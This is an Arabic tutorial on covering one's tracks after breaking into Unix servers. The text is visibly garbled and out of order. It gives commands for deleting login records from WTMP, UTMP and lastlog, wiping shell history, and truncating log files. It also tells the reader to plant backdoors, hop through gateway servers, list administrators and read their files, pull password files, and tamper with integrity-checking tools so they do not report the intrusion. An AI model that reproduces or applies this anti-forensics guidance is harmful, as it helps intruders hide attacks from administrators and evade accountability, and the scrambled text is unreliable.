‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫مقدمه بسيطه ‪:‬‬ ‫==========‬ ‫في البدايه و قبل كل شئ ارجو منكم تحمل اخطائي سواء كانت نحويه او املئيه ‪ ..‬ارجو ان تكون صبورا متانيا حتى اخر الموضوع‬ ‫‪76‬‬ .‬‬ ‫الموضوع ليس صغير و ليس بسهل في القراءه ‪ .‬كل ما اسعى له هو تعميم‬ ‫الفائده على الجميع‬ ‫و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها ‪.

‬كما‬ ‫انه لبد من الحرص و فهم المور اذا كنت تريد ان تسمي نفسك هكر ‪ hacker‬بمعنى الكلمه‬ ‫ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لنك من المعروفين عنهم بالحتراف او انك‬ ‫ترى ذلك في نفسك ‪ .‬‬‫ تحقق من ‪syslog configuration and logfile‬‬‫ تحقق من نوعيات برامج المن المثبته‬‫ تحقق من وجود المدراء ‪Admins‬‬‫ كيف يمكن تصحيح ‪checksum checking software‬‬‫ حيل المستخدم المنيه‬‫الجزء الخامس ‪ :‬ماذا تفعل ان وضعت تحت المراقبه‬ ‫الجزء السادس ‪ :‬ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‬ ‫‪77‬‬ ..‬بمعنى اخر ‪ .‬لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد النتهاء من قراءة‬ ‫الموضوع ‪.‬كل من اخواننا و اساتذتنا من كتبوا‬ ‫دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق ‪log files‬‬ ‫‪ .‬لكن انشاله سيكون دفعه للمام و ليس‬ ‫لن تخاف و تتراجع‬ ‫اسلوب الموضوع غريب ‪ ...‬؟‬ ‫و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!‬ ‫يمكن يرى البعض ان هذا لم بحدث قط لي شخص نعرفه ؟ او ان بلدنا ليس فيها هذه التقنيات العاليه !! لكن‬ ‫هذا قد يحدث يوم ما !!‬ ‫و ايضا انت لتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه ‪ ..‬و عادة ما نتجنبه دائما ‪ .......‬‬ ‫الجزء الثالث ‪ :‬الساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ) و سيتم عرضها من‬ ‫خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امن نفسك‬‫ حسابك الخاص‬‫ ملفات اللوق ‪LoGs‬‬‫ ل تترك اي اثر‬‫ امور و اشياء يجب تجنبها و الحظر منها‬‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها ) و سيتم عرضه من خلل النقاط التاليه (‬ ‫ تمهيد‬‫ امنع تقفى اثرك من اي نوع‬‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪.‬لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه‬ ‫************************‬ ‫الموضوع مقسم الى ‪ 8‬اجزاء ‪:‬‬ ‫=================‬ ‫الجزء الول ‪ :‬المقدمه ) و هو ماقد قمت انت بالنتهاء من قرائته حاليا (‬ ‫الجزء الثاني ‪ :‬المور العقليه و كيف تصبح **" ‪ " Paranoid‬هذا الجزء سيتم عرضه من خلل هذه‬ ‫المواضيع ‪:‬‬ ‫ الدافع او الحافز‬‫ لماذا ان لبد ان تصبح " ‪" Paraniod‬‬‫ كيف يمكن ان تصبح " ‪ " Paranoid‬؟‬‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه ‪ .‬سيتم توضيح معناها و مفهومها مع شرح هذا الجزء‬ ‫انشاله ‪.‫هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك ‪ ..‬‬ ‫************************‬ ‫اذا كنت تظن ان الحصول على ترجمة الثغرات ) ‪ ( exploites‬باسرع ما يمكن هو ما يجعلك محترفا و‬ ‫متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "‬ ‫ماذا ستفيدك الثغره الحديثه جدا ) ‪ ( 0day‬عندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره ‪ .

‬‬ ‫يمكن ان نلخض ما ذكر من خلل الكلمات التاليه ‪ paraniod :‬تعني ان تصبح شديد الحذر و الشك في‬ ‫جميع الظروف‬ ‫لماذا يجب توخي الحذر بهذه الطريقه المخيفه ؟!!‬ ‫لن توقعك دائما الى اسوء الظروف يجعلك تسير في امان ‪ ...‬سليما ‪% 100‬‬ ‫ كيف تصبح " ‪ " Paranoid‬؟‬‫*********************‬ ‫اذا كنت قرأت ما سبق و اقتنعت به انت بالفعل اصبحت هذا الشخص " ‪ " Paranoid‬لكن القتناع وحده ل‬ ‫يكفي و التحمس وحده وليد اللحظه ايضا ليكفي ‪ .‬و لن ما تفعله هو شئ كبيير جدا ‪ ......‬لذا فان‬ ‫معظم من يسقطون ل يقومون ثاني ابدا !!‬ ‫لذا فاصبح حذرا جدا و شكاكا ‪ ..‬ابوك ‪ ...‬مثلها مثل بناء‬ ‫عضلت الجسم لن يكبر الجسم و يتقسم ال بعد ممارسة الرياضه الخاصه بذلك ) على سبيل المثال (‬ ‫مهما كنت متمرس او لديك الكثيير من المعلومات لبد اخذ اشد الحتياطات و الحذر قبل القيام باي شئ‬ ‫ لماذا يجب ان تصبح " ‪ " Paranoid‬؟‬‫***************************‬ ‫كلمة " ‪ " Paranoia‬في اللغه النجليزيه تعني جنون الرتياب ) نزعه عند الفراد تجعلك تشك في جميع‬ ‫المور و جميع الشخاص (‬ ‫اعتقدان المور بدات تتضح لنا بعد معرفة اصل هذه الكلمه ‪...‬عليك الهتمام بما ما قد يصيب اهلك ‪ ......‬لبد ان تعرف لمن تقول هذه الحقيقه و كيف تتعامل مع الخرين ‪..‬نظرة الناس الغيير طبيعيه لك ) ليست نظرة اعجاب انما نظرة خوف‬ ‫( ‪ ..‬العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ‪....‬ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الن ‪!!! ..‬‬ ‫مسئول و حريص‬ ‫المخترق ) ‪ ( Hacker‬الناجح لبد و ان تتوفر فيه هذه المبادىء و المكانيات العقليه ‪ ..‬زوجتك‬ ‫و اطفالك ) ان كنت متزوج (‬ ‫ربما لتشعر بان ماتقوم به هو جريمه ‪ .‫الجزء السابع ‪ :‬قائمه بافضل البرامج للتخفي و الختباء‬ ‫الجزء الثامن ‪ :‬كلمه ختاميه ‪ ...‬لن تحظى بفرص العمل التي تستحقها ‪ ..‬لكن في الحقيقه هي جريمه !!‬ ‫هل تعرف ماذا سينتظرك ان تم القبض عليك ؟!‬ ‫سيتم حرمانك من كل امور الكومبيوتر ‪ .‬ما تراه انت‬ ‫بعينك المجرده انك تغير الصفحه الرئيسيه ‪ ..‬او تقوم بتحميل بعض المعلومات من السيرفر هو شئ بسيط بل‬ ‫و سهل جدا‬ ‫ماذا لو انك اخترقت سيرفر معين و تم رصدك و تتبعك و القبض عليك من قبل الشرطه !؟! و انك سترمى في‬ ‫السجن كالسارقين و المجرمين‬ ‫ان كنت ل تهتم بما قد يحصل لك ‪ ....‬‬ ‫************************‬ ‫الجز الثاني ‪:‬‬ ‫=======‬ ‫ الدافع و الحافز ‪:‬‬‫*************‬ ‫لبد من تحكيم العقل للنجاح في اي عمل ‪ .‬او حتى بريديك الشخصي و اللكتروني ) لبد ان تعمل حساب الغير المتوقع (‬ ‫‪78‬‬ ..‬امك ‪ .‬امن نفسك‬ ‫اخذ جميع الحتياطات‬ ‫لتهتم بما قديقوله الكثيرون عنك بانك خواف او ما شابه‬ ‫اهتم باي ملف ‪ log‬مهما كانت قيمته تافهه‬ ‫لتصبح ‪ hacker‬عليك ان تقوم بعملك ‪ ....‬‬ ‫اعمل حساب انك مراقب دائما و انه هناك كاميرا خفيه وراك دائما ‪ .‬اخوتك ‪ .‬انما لبد ان يكون القلق و التوتر موجودين بشكل دائم‬ ‫في حياتك ) اللكترونيه (‬ ‫اذا كنت فعل تريد ان تكون هكر حقيقي ‪ .‬ستسدعى عند حصول اي مشاكل اخرى من هذا النوع ‪ .‬فاحذر في كلمك على الهاتف لنه قد‬ ‫يكون مراقب ‪ ..

‬حتى لو كنت مخترق‬ ‫متمرس لبد ان تستوعب الفكار القادمه‬ ‫ امن نفسك ‪:‬‬‫***********‬ ‫ ماذا لو قرأ ال ‪ SysAdmin‬رسائلك البريديه اللكترونيه ؟‬‫ ماذا لو كانت اتصالتك الهاتفيه مسجله و مراقبه من قبل الشرطه ؟‬‫ ماذا لو تم ضبط الكومبيوتر الشخصي و السيطره على كل معلوماتك ؟‬‫اذا كنت لتقوم بعمل اي اتصالت هاتفيه مع اي شخص من الهاكرز او الكراكرز ‪ .5‬احدى انظمة التشغيل غير شائعة الستخدام‬‫خصوصا في عالمنا العربي (‬ ‫ لمستخدمين انظمة ال ‪ Unix‬اليكم ‪CFS v1..‬‬ ‫كما انه لبد و انك تمتلك بعض الملفات اللزمه للختراق او بعض المعلومات الي تعبر مدينه لك في حالة‬ ‫حدوث رصد لجهازك ) كبسه (‬ ‫>‪--‬‬ ‫‪<-‬‬‫قم بتشفير كل ما تملكه من معلومات حساسه ‪sensitive data‬‬ ‫يمكنك ذلك باستخدام بعض البرامج الموجوده مجانا على النترنت ‪ ..‬ول تبعث اي ايميلت فيه‬ ‫معلومات مشبوهه و ل تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ل يشكل اي خوف لنه‬ ‫ببساطه ايضا انت لست مخترق او ‪(= hacker‬‬ ‫لنه لبد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال ‪ ...‬لتبادل الخبار و الفكار ‪.‬لبد ان تبقى هكذا طوال الوقت‬ ‫و تذكر هذه الكلمات ‪ :‬لحظة كسل واحده في اتخاذ الحتياطات المنيه قد تغير حياتك باكملها ؟!!!!‬ ‫دائما تذكر الدافع‬ ‫ الجزء الثالث ‪:‬‬‫=========‬ ‫ تمهيد‬‫******‬ ‫يجب معرفة هذه المور القادمه و استيعابها جيدا قبل ممارسة اي عملية اختراق ‪ .4b‬‬‫ لمستخدمين نظام ‪ *Amiga‬اليكم ‪ * ) EnigmaII v1..‬دعني اسألك هذه السئله ؟‬ ‫هل تريد ان يراك الخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر‬ ‫قلوبهم عليك ؟!‬ ‫هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟‬ ‫تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه‬ ‫ و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!‬‫******************************************‬ ‫بما انك قد استوعبت ماذكر حتى الن و قررت ان تكون انسان حريص جدا ‪ ...‬و هذه قائمه بافضل البرامج و التي‬ ‫تعتبر اختيار الهاكرز الول ‪:‬‬ ‫ لمستخدمين ‪ MsDos‬اليكم ‪ SFS v.33‬‬‫لتشفير الملفات بشكل فردي ) ملف بملف ( اليكم هذه البرامج ) الكثر شهره و الحسن اداء ( ‪:‬‬ ‫ ‪Triple DES‬‬‫ ‪IDEA‬‬‫ ‪(Blowfish (32 rounds‬‬‫ ‪file2file‬‬‫لتشفير اليميلت ‪:‬‬ ‫‪79‬‬ .‫اذا ما قد ذكرته ل يهمك و انك انسان غير مبالي ‪ .17‬او ‪SecureDrive 1.

‬ل توجد في القواميس ‪ .x‬‬‫يمكنك ايضا تشفير عملية اتصالك ب ‪ ) Unix System‬على اساس انه ممكن ان تكون مراقب (‬ ‫و ذلك باستخدام ‪:‬‬ ‫ ‪ SSH‬المن حتى الن‬‫ ‪DES Login‬‬‫اجعل كلماتك السريه صعبة التخمين ‪ .‫ ‪PGP v2.‬اجعلها اكبر عدد ممكن من الحرف ) يعني عادة عند عمل اي اشتراك يطلب منك‬ ‫كلمه سريه تتكون من ‪ 8.‬غير منطقيه ‪ ..‬‬ ‫اذا انت بالفعل متعمق جدا في الهاكينج فلبد من تشفير كل شئ يتعلق بهذه المور !!‬ ‫احفظ دائما نسخه احتياطيه من معلوماتك على ‪ CD‬او ‪ HD‬و بالطبع تكون مشفره حتى اذا خسرت‬ ‫المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه‬ ‫لتحتفظ بملفات لتحتاجها ‪ .‬و يرى البعض انه فيما اقوله‬ ‫مبالغه !!! لكن انت ل تعرف ماذا يخبئ لك المستقبل !! فلماذا لتستعد من الن !!!‬ ‫كما انه هناك الكثيير من اخواننا العرب في دول الخارج الذي بالفعل تتوفر فيها اجهزة التنصت هذه ‪ .‬انما الهتمام بعكس السكيورتي هو المشكله ==< الهاكينج‬‫>‪----‬‬ ‫ملفات اللوق ‪: LoGS‬‬ ‫============‬ ‫‪80‬‬ .‬المخابرات ‪ ..‬و‬ ‫على راي المثل المصري " امشي عدل يحتار عدوك فيك " فكلما كنت احتياطيا و حركاتك تحسبها بشكل‬ ‫صحيح !!! ففرص اطاحتك قليله جدا‬ ‫حساباتك و اشتراكات الشخصيه ‪:‬‬ ‫===================‬ ‫هنا سأتكلم عن حساباتك الشخصيه سواء كانت في العمل\المدرسه\الجامعه\اي كان فعليك بالتالي ‪:‬‬ ‫ ابدا ل تقوم باي عمل غيير قانوني ‪ .‬و ان كان لديك ‪ document files‬او ملفات مطبوعه و ل تريدها مرة اخرى‬ ‫لتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك العتياديه او ان اردت الحتفاظ بها‬ ‫فعليك كتابتها من جديد باسلوب مرمز او مشفر ليعرفه ال انت !!‬ ‫هل تعرف انه من الممكن ان ‪:‬‬ ‫=================‬ ‫تكون مراقب من ‪ :‬الشرطه ‪ ..‬لكن في نفس‬ ‫الوقت لبد ان تتذكرها دائما‬ ‫اخترها من كتاب تتمتلكه ‪ ..‬غير شائعه ‪ .4‬احرف ( فاختر ال ‪ 8‬حروف‬ ‫ل تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي ‪ ..6..‬‬‫ لكن كل مو هو مختص بالهاكينج من ملفات لبد ان تشفر او انها يتم مسحها فورا‬‫ ابدا ل تحفظ اي برامج و ادوات الختراق على الهارديسك في حسابك الشخصي‬‫ بريدك الحقيقي لتعطيه ال لمن تثق فيه ثقه عمياء !!!!‬‫ اهتمامك بالسكيورتي ل يجعلك مشبوها ‪ ...‬او مشبوه بحسابتك الشخصيه التي فيها يكون اسمك الحقيقي و‬‫هويتك و تفصيلت كامله عنك‬ ‫ عمرك ما تحاول ان تتصل بموقع قد تم اختراقه بواسطة ال ‪telnet‬‬‫ يمكنك الشتراك بحسابك الخاص في قائمة البريد لي موقع امني ‪ security‬من دون خوف ‪...‬انما يمكنك بان تشفرها ) حتى برموز تفهمها انت‬ ‫فقط ( و اتصل بهم من هواتف الشارع او من العمل ‪....‬هاكرز اخرون و انهم يتسطيعون رصد كل حركات باستخدام وسائل‬ ‫حديثه ليمكن تخيلها‬ ‫مثل ‪:‬‬ ‫ اجهزه تصوير تستطيع تصويرك عند بعد مئات المتار‬‫ نقطة ليزر مصوبه نحو غرفتك للتصنت على مكالماتك‬‫ موجات عالية التردد للتنصت على لمسات و صوت يديك على ال ‪!! keyborad‬‬‫تختلف بالطبع هذه المكانيات من مكان لخر و من دوله الى اخرى ‪ ..

.letter..history‬‬ ‫‪: Backup Files‬‬ ‫‪~* .lastlog‬‬ ‫ل تترك اثرا ‪:‬‬ ‫=======‬ ‫كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق ‪ .. *.‬لكن اتعلمت ( و‬ ‫هو انك تمسح اللوقات ‪logfiles‬‬ ‫علطول ‪ ..‬هذا مجدي في حالة انك لتهتم بان يعرف الدمين انه هناك مخترق ما قد دخل على النظام ‪ .1 .logout‬‬ ‫‪echo mv save.9‬مننا ) حتى انا كنت اقع في نفس هذا الخطا زمان ‪ .1‬‬ ‫‪echo rm -rf .bash_history‬‬ ‫‪zsh : .‬دون ان تقوم بتغيير‬ ‫اي شئ يلفت انتباه مدير النظام‬ ‫و لعمل ذلك تابع معي ‪:‬‬ ‫لتعتمد البرامج التي روجت على انها لتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل‬ ‫برنامج ‪ZAP (or ZAP2‬‬ ‫لنه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلحظه مدير النظام‬ ‫اذا عليك بالقيام بذلك يدويا ‪.logout>>. rlogin‬يتم تسجيلها في هذه الملفات ‪ .logout save.‬‬ ‫عادة لبد ان تكوت ‪ root‬لتغير و تعدل في ال ‪ ) log files‬باستثناء بعض التوزيعات القديمه جدا (‬ ‫اماكن تواجد ملفات اللوق ‪ ) default‬تختلف باختلف التوزيع (‬ ‫‪UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log‬‬ ‫‪LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log‬‬ ‫و في بعض النسخ القديمه ‪$home/.logout‬‬ ‫‪81‬‬ .logout>>..bak‬‬ ‫لكن الحل موجود ايضا لمسح ال ‪: History files‬‬ ‫‪mv . ftp .log in/logout + tty + host‬‬‫ ‪ UTMP‬للمتواجدين اونلين حاليا !‬‫ ‪ LASTLOG‬تسجيل من اين جاءت هذه ‪logins‬‬‫** سنتكلم عنهم باستفاضه و تعمق فيما بعد ) في جزء اخر من نفس الموضوع (‬ ‫كل عملية دخول بواسطة ال ‪ telnet .‬لكنهم ينسون امرا هاما و قاتل !!! و‬ ‫هي الملفات التي توجد هنا‬ ‫‪tmp and $HOME/‬‬ ‫و جود ال ‪ Shell History‬في ‪ $HOME‬مصدر قلق كبيير ‪:‬‬ ‫‪: History files‬‬ ‫‪sh : .‬لبد حذف دخولك من‬ ‫هذه الملفات و ال سيتم معرفة التي ‪:‬‬ ‫ ماذا قمت بالختراق !!‬‫ من اي مكان انت قادم‬‫ كم من الوقت بقيت اونلين ‪..history>.sh_history‬‬ ‫‪bash: ..history‬‬ ‫‪ksh : ..dead.‬‬‫خطا يقع فيه الجميع بنسبة ‪ % 99.logout‬‬ ‫‪echo rm -rf .‫هناك ‪ 3‬ملفات مهمه جدا ‪:‬‬ ‫ ‪ WTMP‬للتسجيل عند الدخول و الخروج ) ‪( log on/off .sh_history‬‬ ‫‪csh : .‬اما اذا‬ ‫اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلحظك اي شخص ‪ .

.‬قم بالتصال بال ‪ gateway server‬و من ثم تتصل بالسيرفر المراد‬ ‫اختراقه ‪..‬‬ ‫من الشيل الذي ستخترق منه ‪ ..‬عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ما‬ ‫يلي ‪:‬‬ ‫ امنع تقفى اثرك من اي نوع‬‫**********************‬ ‫قد يلحظ الدمين ) مدير الشبكه ( وجودك كمخترق ‪ hacker‬و انك اطحت باحد المواقع لكن هذا ليهم ‪.‬حيث انك في غنى عن التعديل في ملفات‬ ‫اللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على ال ‪(= hacked system‬‬ ‫ملحوظه ‪ :‬اذا كنت قادر على التصال بسرفيرات ‪ dialup‬كثييره فل حاجه لن تستخدم ‪hacking‬‬ ‫‪82‬‬ .‫ امور و اشياء يجب تجنبها و الحظر منها‬‫======================‬ ‫لتقوم ابدا بكسر اي باسورد ال على ‪ encrypted partition‬كما عليك دائما انت تحذر من استخدام‬ ‫اشتراكاتك ) اشتراك الجامعه على سبيل المثال (‬ ‫لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه ‪ admin‬و من ثم سيعرف مالذي تقوم به و الملفات‬ ‫التي تستخدمها الخ ‪..‬يعني حين ان تستخدم بعض الشتراكات او ال ‪ shells‬التي تسمح بالعمل الخلفي‬ ‫‪ background‬لبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار !!!‬ ‫حاول ان لتستخدم ‪ parametres‬على قدر المستطاع ‪ ..‬‬ ‫==< ) تحتاج دائما ل ‪ root access‬لتغيير اللوق (‬ ‫باستخدامك ل ‪ Dialup server‬يجنبك الكثيير من المشاكل ‪ ....‬على سبيل المثال اذا اردت ان تتصل من الشيل‬ ‫على تيلنت لموقع معين او سيرفر معين لتقوم بعمل التي ‪telnet http://www...‬‬ ‫المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!‬ ‫لذا ففي هذا الجزء سيتم توضيح كل الحتمالت و الساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن‬ ‫ان تمنعها ‪.host.com‬‬ ‫و هكذا ‪.‬‬ ‫لتفكر في نفسك فقط ‪ ...‬‬ ‫في حالة انك اخترقت سيرفر معين من الفضل ان تضع عليه ‪ backdoors‬مخصصه لنظام التشغيل ) مش‬ ‫‪ sub7‬هههههههههه ( و هي كثييره و موجوده مجانا على النترنت‬ ‫الجزء الرابع ‪ :‬التقنيات الحديثه الي يتي يجب ملحظتها‬ ‫===============================‬ ‫ تمهيد‬‫*******‬ ‫بعد ان ثبت اول ‪ sniffer‬و خططت لبدا الختراقات ‪ .‬‬ ‫حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي‬ ‫مخيفه على الفاضي ‪....com/ 23 :‬‬ ‫انما ببساطه اتبع الخطوات البطيئه و هي‬ ‫‪telnet‬‬ ‫‪open‬‬ ‫‪/http://www.host.‬‬ ‫* من الطبيعي ) العادي ( ان يسهل على مدير الشكبه ) ‪ ( admin‬معرفة النظام الذي كان المخترق عليه‬ ‫عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او من‬ ‫ال ‪ output‬من ال ‪sniffer‬‬ ‫او من اوامر ‪ netstat‬في حالة ان المخترق مازال موجودا ‪online‬‬ ‫من اجل هذا تختاج ال ‪!! GateWay Server‬‬ ‫* ‪ A gateway server in between‬هذا واحد من الكثيير من السيرفرات التي يوجد لك حساب‬ ‫عليها و التي تعتبر في منتهى السخافه في الستخدام و انت تحتاج لن تكون رووت عليها لتستطيع تغيير ال‬ ‫‪wtmp and lastlogs‬‬ ‫كما انه لبد ان من استخدام اكثر من ‪ gateway server‬و ان تبدل بينهم باستمرار حتى ل يتم الكشف‬ ‫عنك ‪.

‫‪ server‬لنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خللها‬ ‫بالنسبه للمتواجدين في الوليات المتحده المريكيه و اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق )‬ ‫‪ ( dialup servers‬يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !‬ ‫نتيجه و اختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه ‪:‬‬ ‫ ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تلعب ‪.‬لو استطعت ان تبرمج واحد ) للخوه المبرمجين ( ل تنسى ان تعلنا به =(‬ ‫ تحقق من ‪syslog configuration and logfile‬‬‫************************************‬ ‫تعتمد معظم البرامج على ال ‪ syslog function‬لتسجيل اي شئ يريدونه ‪ .‬حيث انه لبد من ان‬ ‫تخترق ال ‪ loghost‬لتعدل ملفات اللوق‬ ‫يمكن تعديل اللوق ‪ logfiles‬بعدة طرق ابسطها باستخدام اي محرر كتابه ‪ text editor‬او قم بعد اسطر‬ ‫الملف باستخدام ‪ wc‬و من ثم حذف اخر ‪ 10‬اسطر من خلل ‪"head -LineNumbersMinus10" :‬‬ ‫بالعربي ) عدد السطور مطروحا ‪ 10‬منه‪( head -‬‬ ‫اذا كان برنامج ‪ accouting‬مثبت على السيرفر يمكنك ببساطه استخدام ‪acct-cleaner from‬‬ ‫‪ zhart‬و هو هيعمل اللزم‬ ‫اذا كان النظام يستخدم ‪ wtmpx‬و ‪ utmpx‬ايضا فمع السف عزيز انت في ورطه !!! فانا على اعرف اي‬ ‫برنامج للتعامل في هذه الحاله ‪ ....‬فيؤسفني انك لبد من اختراق‬ ‫هذه ‪hosts‬‬ ‫ملف ال ‪ syslog‬موجود في ‪/etc/syslog..conf‬‬ ‫‪83‬‬ .‬‬‫**************************************************‬ ‫***‬ ‫من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها ‪ .2‬ابحث عن كل الملفات التي تغيرت ) حدث فيها تغيير ( من بعد دخولك ‪-‬‬ ‫بعد دخولك قم بعمل ‪ touch /tmp/check‬و بعدها قم "‪"find / -newer /tmp/check -print‬‬ ‫العمليه التي سنقوم بها ستاذخ الشكل التالي ‪ :‬بحث ‪ <-‬نتائج ‪ <-‬مطالعة النتائج ‪ <-‬تعديل‬ ‫قم ايضا بالتشيك على اماكن ال ‪ log files‬العتياديه ‪ /usr/adm‬و ‪ /var/adm‬و ‪/var/log‬‬ ‫اذا يتم تسجيل العمليات في ال ‪ loghost‬يعني ‪ xx@loghost‬فانت هنا في مازق ‪ .‬فعليك ان تتحقق من‬ ‫خصائص ال ‪syslog‬‬ ‫فاذا كانت اللوقات ‪ logs‬لتخزن فقط على الجهاز انما على ‪ hosts‬اخرى ‪ .1‬اعثر على جميع الملفات المفتوحه ‪ :‬و يمكنك ذلك باستخدام برنامج ‪ LSOF‬هو اختصار ‪List Open‬‬ ‫‪ Files‬و من ثم يمكن العثور عليهم و التعديل فيهم‬ ‫‪ ...‬للحصول و العثور على هذه‬ ‫الملفات يمكن ذلك بهاتين الطريقتين ‪:‬‬ ‫‪ ..

‬للتحقق اللسريع من‬ ‫الموضوع نستخدم المر التالي‬ ‫"‪.‫ تحقق من نوعيات برامج المن المثبته‬‫******************************‬ ‫توجد العديد من برامج الفحص المني غالبا على المواقع ذات الحس المني العالي‪ .c‬لنتحال شخصيه المستخدم( ‪ .‬و مدخلت الـ ‪alias‬‬‫أفحص ملف الـ ‪ sulog‬و حدد المستخدمين الذين نجحو في تنفيذ المر ‪ su root‬بنجاح‬‫ أسحب ملف الـ ‪ group‬و أبحث عن جميع المجموعات التي لها علقه بالداره ) ‪admin. s3 etc‬‬ ‫ينبغي على المقتحم أن يتأكد من وجود هذه الدوات و التأكد من التقارير التي ترسلها ‪ .‬و يكون بعضها في مجلد الـ ‪ ~/bin‬الخاص‬ ‫به‪ . tripwire.‬كما يمكن ان يكون هناك ‪ sinnefer‬موضوع لغراض امنيه في نفس المكان‪. spi.‬و إذا ماكانت أدوات أمنيه‬ ‫خفيه مستخدمه‪ .tiger.‬‬ ‫توجد عده طرق لكشف هذه المعلومات‪:‬‬ ‫ قم بفحص الملف ‪ forword.‬‬‫‪wheel.‬‬ ‫من الدوات الت تستعمل في مثل هذه الفحوصات الداخليه‬ ‫‪.‬و أفحص الملفات‬ ‫التاليه ‪ history/.sh_history/. l5‬‬ ‫‪.bash_profile‬لمراجعه أعدادات الـ ‪ alias‬التي تستخدم‪ .‬و تحاول معرفه الحسابات العاديه التي يتم أستخدامها‪.‬‬ ‫أستخدم أحدى الدوات التاليه ‪ chid.‬يمكنك معرفه كل المدراء على الموقع‪ .‬قد يفيدك هذا‬ ‫في معرفه دور المدير على الموقع‪ .bash_history‬لمعرفه الوامر التي يستعملونها عادة‪ .‬و يمكن تنفيذ ذلك بطريقتين‪:‬‬ ‫ قم بتعديل البرنامج برمجيا لكي ل يقوم بالبلغ عنك )واسعه شويه دي( أو قم بأزالته و أستعمل برنامجا‬‫مزيفا‬ ‫ قد تضطر إلى أزاله الـ ‪ back door‬الذي أستعملته و محاوله تحميله بطريقه أخرى‬‫ تحقق من وجود المدراء ‪Admins‬‬‫****************************‬ ‫من المهم أن تجد جميع المدراء على الموقع‪ .‬قم بفحص ملفات ‪.‬أو أكتشاف معلومات مخفيه‪ .c.‬‬ ‫‪ profile/. changeid.‬أدخل إلى مجلداتهم الخاصه ) في حاله عدم أستطاعتك ‪.binaudit. etc‬‬ ‫أسحب ملف ‪ passwd‬بالنسبه للمدير لعرض كلمات سر المدراء‬‫يعد كل هذا ‪ .‬خاصه الـ ‪ Root‬و الملفات التي يستعملها‪ ."crontab -l root‬‬ ‫غالبا ماتكون هذه الدوات محمله و عامله على حساب المدير‪ . cops.login/.‬خاصه المخفيه منها قد تجد‬ ‫بعض الشياء المفيده حقا‬ ‫‪checksum checking software‬‬ ‫************************‬ ‫برامج ‪ ) checksum‬هو قيمة رقمية ُتستعمل للتأكد من خلو البيانات من الخطاء‪ .‬هذه القيمة ُتحسب من‬ ‫خلل عملية كشف الجمع(‬ ‫بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات‪ ،‬وفي حالة حدوث اي‬ ‫تغير‪ ،‬يقوم بفحص الملفات ويستطيع اكتشافها‬ ‫فكيف تعرف مااذا استخدمت هناك برامج التحقق واي النواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم‬ ‫من اجلك ؟‬ ‫هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا‬ ‫استخدمت مثل تلك البرامج علي الملفات للحماية‬ ‫هذه اسماء بعض البرامج التي تقوم ب عملية فحص ‪checksum‬‬ ‫‪84‬‬ . root.‬و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات ‪ .‬للتأكد من أنها ل‬ ‫تكشف عمليه القتحام‬ ‫يمكنك تعديل 